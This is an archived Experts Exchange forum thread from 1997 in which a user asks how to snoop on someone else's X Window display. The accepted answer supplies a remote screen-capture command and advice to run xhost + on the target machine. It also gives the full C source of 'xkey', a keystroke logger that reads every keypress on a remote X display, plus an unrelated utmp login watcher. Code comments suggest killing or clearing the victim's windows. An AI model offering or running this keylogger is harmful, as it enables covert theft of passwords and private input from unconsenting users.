Still celebrating National IT Professionals Day with 3 months of free Premium Membership. Use Code ITDAY17

x
?
Solved

Snooping other windows in X-Windows.

Posted on 1997-06-01
2
Medium Priority
?
523 Views
Last Modified: 2013-12-26
Hi. How can I snoop another window?
In answer to my previos question dhm wrote : "There are ways to snoop on somebody else's window, but that's not what you
asked :-)". So, OK, now I'm asking , how can I snoop somebody else's window? Thanks for Your help.
0
Comment
Question by:dpodvaln
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2
2 Comments
 
LVL 1

Accepted Solution

by:
leendert earned 1000 total points
ID: 1293159

Hi...

I know of two ways to snoop someone else's window. With
both these methods you will need access via
xhost +<your machines name> from the machine you'd like to
snoop. That is you will need to enter the command
xhost +<your machine's name> from the other person's machine
if the stuff mentioned underneath does not work.

Here are the two methods:

1) This one will bring back a snapshot of the other machines
   screen.

   Here is the command :
      
   xwd -root -display machinename:0.0  | xwud

   where machinename is the name of the machine you'd like
   to take the snapshot from.

2) The second is a .c program with wich you can see exactly
   what keystrokes the other party uses. Compile it and run
   it with the display of the other machine as parameter.

      example : xtspy machinename:0.0

Here is the .c program :


#include <sys/types.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <sys/fcntl.h>
#include <stdio.h>
#include <ctype.h>
#include <utmp.h>

/*
 * Defines to work around System V
 */
#define bcopy(s1, s2, len) memcpy(s2, s1, len)
#define index(s, c) strchr(s, c)
#define rindex(s, c) strrchr(s, c)
#define bzero(s, len) memset(s, 0, len)
#define bcmp(s1, s2, len) (memcmp(s1, s2, len)!=0)
#define WAITIME 5


#define USIZ    (sizeof(struct utmp))

extern char *malloc ();
extern char *realloc ();
extern off_t lseek ();

static void
szprint (s, max)
char *s;
int max;
{
    /* catch the guy even if he puts esc. codes in ! */
    while (max-- && *s != '\0')
        if (isprint (*s))
            (void) fprintf (stderr, "%c", *s++);
        else
            (void) fprintf (stderr, "(0x%X)", *s++);
}


static void
notify (old, new)
struct utmp *old;
struct utmp *new;
{
    char *op;
    struct utmp *u;

    u = new;
    op = "in";
    if (new->ut_name[0] == '\0')
    {
        u = old;
        op = "out";
    }

    szprint (u->ut_name, sizeof (u->ut_name));
    if (u->ut_line[0] != '\0')
    {
        (void) fprintf (stderr, "@");
        szprint (u->ut_line, sizeof (u->ut_line));
    }
    (void) fprintf (stderr, " (");
    szprint (u->ut_line, sizeof (u->ut_line));
    (void) fprintf (stderr, ") logged %s\n", op);
}


main ()
{
    time_t m_time;
    int utfd;
    struct utmp *up;
    struct utmp ubuf;
    int upsiz;
    struct stat sbuf;

    if (stat (UTMP_FILE, &sbuf) != 0 || (utfd = open (UTMP_FILE, O_RDONLY)) < 0)
    {
        perror (UTMP_FILE);
        exit (1);
    }
    m_time = sbuf.st_mtime;

    if ((up = (struct utmp *) malloc ((unsigned) sbuf.st_size)) == NULL)
    {
        perror ("malloc utmp buffer");
        exit (1);
    }
    upsiz = sbuf.st_size;

    if (read (utfd, (char *) up, (int) sbuf.st_size) != sbuf.st_size)
    {
        (void) fprintf (stderr, "read %ld bytes from ", sbuf.st_size);
        perror (UTMP_FILE);
        exit (1);
    }

    while (1)
    {
        if (getppid () == 1)
            exit (0);

        (void) sleep (WAITIME);

        if (stat (UTMP_FILE, &sbuf) < 0)
        {
            perror (UTMP_FILE);
            exit (1);
        }

        if (upsiz < sbuf.st_size)
        {
            up = (struct utmp *) realloc ((char *) up, (unsigned) sbuf.st_size);
            if (up == NULL)
            {
                perror ("realloc utmp buffer");
                exit (1);
            }
            upsiz = sbuf.st_size;
        }

        if (sbuf.st_mtime != m_time)
        {
            int i;

            if (lseek (utfd, 0L, 0) != 0L)
                continue;

            for (i = 0; i < sbuf.st_size / USIZ; i++)
            {
                if (read (utfd, (char *) &ubuf, USIZ) != USIZ)
                    continue;
                if (bcmp ((char *) &up[i], (char *) &ubuf, USIZ))
                {
                    notify (&up[i], &ubuf);
                    (void) bcopy ((char *) &ubuf, (char *) &up[i], USIZ);
                }
            }
            m_time = sbuf.st_mtime;
        }
    }
}


Try the above. Hope this will solve your problem...

Leendert.
0
 
LVL 1

Expert Comment

by:leendert
ID: 1293160
Hi there,

I actually uploaded the wrong c file to snoop another
machines xwindows...

Here is the correct one. Sorry about that... :-}

 * To Compile, run it through gcc like
 * this :
 *
 *    gcc -o xkey xkey.c -lX11 -lm
 *
 * To run it, just use it like this :  xkey displayname:0
 * and watch as that display's keypresses show up in your shell window.
 *
 *    Dominic Giampaolo (nick@cs.maxine.wpi.edu)
 */
#include <stdio.h>
#include <X11/X.h>
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/StringDefs.h>
#include <X11/Xutil.h>
#include <X11/Shell.h>

char *TranslateKeyCode(XEvent *ev);


Display *d;

void snoop_all_windows(Window root, unsigned long type)
{
  static int level = 0;
  Window parent, *children, *child2;
  unsigned int nchildren;
  int stat, i,j,k;

  level++;

  stat = XQueryTree(d, root, &root, &parent, &children, &nchildren);
  if (stat == FALSE)
   {
     fprintf(stderr, "Can't query window tree...\n");
     return;
   }

  if (nchildren == 0)
    return;

  /* For a more drastic inidication of the problem being exploited
   * here, you can change these calls to XSelectInput() to something
   * like XClearWindow(d, children[i]) or if you want to be real
   * nasty, do XKillWindow(d, children[i]).  Of course if you do that,
   * then you'll want to remove the loop in main().
   *
   * The whole point of this exercise being that I shouldn't be
   * allowed to manipulate resources which do not belong to me.
   */
  XSelectInput(d, root, type);

  for(i=0; i < nchildren; i++)
   {
     XSelectInput(d, children[i], type);
     snoop_all_windows(children[i], type);
   }

  XFree((char *)children);
}


void main(int argc, char **argv)
{
  char *hostname;
  char *string;
  XEvent xev;
  int count = 0;

  if (argv[1] == NULL)
    hostname = ":0";
  else
    hostname = argv[1];

  d = XOpenDisplay(hostname);
  if (d == NULL)
   {
     fprintf(stderr, "Blah, can't open display: %s\n", hostname);
     exit(10);
   }

  snoop_all_windows(DefaultRootWindow(d), KeyPressMask);

  while(1)
   {
     XNextEvent(d, &xev);

     string = TranslateKeyCode(&xev);
     if (string == NULL)
       continue;

     if (*string == '\r')
       printf("\n");
     else if (strlen(string) == 1)
       printf("%s", string);
     else
       printf("<<%s>>", string);
     fflush(stdout);
   }
}


#define KEY_BUFF_SIZE 256
static char key_buff[KEY_BUFF_SIZE];

char *TranslateKeyCode(XEvent *ev)
{
  int count;
  char *tmp;
  KeySym ks;

  if (ev)
   {
     count = XLookupString((XKeyEvent *)ev, key_buff, KEY_BUFF_SIZE, &ks,NULL);
     key_buff[count] = '\0';

     if (count == 0)
      {
        tmp = XKeysymToString(ks);
        if (tmp)
          strcpy(key_buff, tmp);
        else
          strcpy(key_buff, "");
      }

     return key_buff;
   }
  else
    return NULL;
}

-----------------------------------------------------------

This will help you out on your problem...

Leendert.
0

Featured Post

Free Tool: SSL Checker

Scans your site and returns information about your SSL implementation and certificate. Helpful for debugging and validating your SSL configuration.

One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Introduction: Dynamic window placements and drawing on a form, simple usage of windows registry as a storage place for information. Continuing from the first article about sudoku.  There we have designed the application and put a lot of user int…
Introduction: The undo support, implementing a stack. Continuing from the eigth article about sudoku.   We need a mechanism to keep track of the digits entered so as to implement an undo mechanism.  This should be a ‘Last In First Out’ collec…
This video will show you how to get GIT to work in Eclipse.   It will walk you through how to install the EGit plugin in eclipse and how to checkout an existing repository.
Sometimes it takes a new vantage point, apart from our everyday security practices, to truly see our Active Directory (AD) vulnerabilities. We get used to implementing the same techniques and checking the same areas for a breach. This pattern can re…

688 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question